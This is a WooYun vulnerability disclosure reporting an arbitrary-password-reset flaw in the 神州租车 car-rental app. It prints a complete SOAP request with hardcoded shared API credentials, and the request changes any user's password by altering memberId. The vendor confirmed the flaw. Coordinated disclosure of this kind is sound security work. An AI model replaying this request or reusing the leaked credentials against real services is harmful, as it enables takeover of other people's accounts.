当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044826

漏洞标题:神州租车任意用户密码修改漏洞

相关厂商:神州租车

漏洞作者: 带馅儿馒头

提交时间:2013-12-03 19:48

修复时间:2014-01-17 19:48

公开时间:2014-01-17 19:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-03: 细节已通知厂商并且等待厂商处理中
2013-12-05: 厂商已经确认,细节仅向厂商公开
2013-12-15: 细节向核心白帽子及相关领域专家公开
2013-12-25: 细节向普通白帽子公开
2014-01-04: 细节向实习白帽子公开
2014-01-17: 细节向公众公开

简要描述:

能够随意修改并登陆任意用户帐号~好吧~我其实是来求礼物的~~~

详细说明:

问题出在神州租车的app端,校验机制设计的太脆弱~
下面是修改用户个人资料的请求数据包,数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值,又没有其他的验证机制,那么这里肯定可以修改任意用户的值~

POST http://sdk.zuche.com/CARSDK/services/zuche1 HTTP/1.1
Host: sdk.zuche.com
Connection: close
Accept-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Content-Length: 526
Connection: close
SOAPAction: http://sdk.zuche.com/CARSDK/services/zuche1?UpdateUser
User-Agent: 神州租车 2.6 (iPhone; iPhone OS 7.0.4; zh_CN)
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'>
<soap:Header>
<CheckSoap xmlns='http://tempuri.org/'>
<Account>szzciphone</Account>
<Password>szzc#iphone</Password>
</CheckSoap>
</soap:Header>
<soap:Body>
<UpdateUser xmlns='http://tempuri.org/'>
<User>{"memberId":"3xxxx3","password":"123qwe","emailaddress":"xxxxx@sina.cn"}</User>
</UpdateUser>
</soap:Body>
</soap:Envelope>


所以,我们通过修改memberId就能修改任意用户的信息,通过测试这里的emailaddress参数如果为空,将不会更改用户原来设置的值,修改不同id用户的密码后,系统会返回该用户的帐号信息(手机号码),那么有了手机号码,我们就能登陆任意用户的帐号,下面是我自己的帐号测试结果;

1.png


下面我们随意测试一个用户的帐号吧;

2.png


这个就是证明咯;

3.png


漏洞证明:

见详细说明

修复方案:

各种校验,没说的~

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-12-05 17:14

厂商回复:

感谢提醒,正在修复

最新状态:

暂无